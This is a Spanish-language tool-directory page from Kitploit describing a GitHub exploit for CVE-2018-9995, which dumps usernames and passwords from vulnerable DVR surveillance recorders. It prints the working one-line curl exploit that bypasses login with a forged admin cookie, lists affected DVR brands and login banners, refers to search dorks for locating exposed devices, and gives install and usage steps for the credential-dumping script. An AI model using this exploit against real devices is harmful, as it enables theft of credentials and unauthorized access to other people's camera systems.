Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-9995_dvr_credentials — (CVE-2018-9995) Obtener credenciales de DVR | Kitploit
Herramientas/GitHubGitHub/ezelf/cve-2018-9995_dvr_credentials
ReconocimientoSeguridad IoTAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubezelf/cve-2018-9995_dvr_credentials

CVE-2018-9995_dvr_credentials

(CVE-2018-9995) Obtener credenciales de DVR

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
557199hace 7 añosRevisado por Kitploit

[Herramienta] Mostrar credenciales DVR

root@kitploit:~
[*] Título del Exploit:       "Obtiene credenciales DVR" 
[*] CVE:                 CVE-2018-9995
[*] Puntuación Base CVSS v3:  7.3 / 10
[*] Cadena de vector CVSS:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] Fecha:                09/04/2018
[*] Autor del Exploit:      Fernandez Ezequiel ( twitter:@capitan_alfa )

DVR_wall

Exploit:

root@kitploit:~
	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Probado en DVR (banner/fabricante ?):

root@kitploit:~
Novo
CeNova
QSee
Pulnix
XVR 5 en 1 (título: "XVR Login")
Securus,  - Security. Never Compromise !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

En la naturaleza:

DVR_dorks_0 DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

Posibles banners de interfaz (web):

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

Interior:

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

HERRAMIENTA: "Mostrar todas las credenciales DVR"

Inicio rápido

root@kitploit:~
usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt

ayuda

root@kitploit:~
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obteniendo credenciales expuestas

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

POCs (Salida) :

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

Blog:

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html

¡Te veo...! xd

Descargar herramienta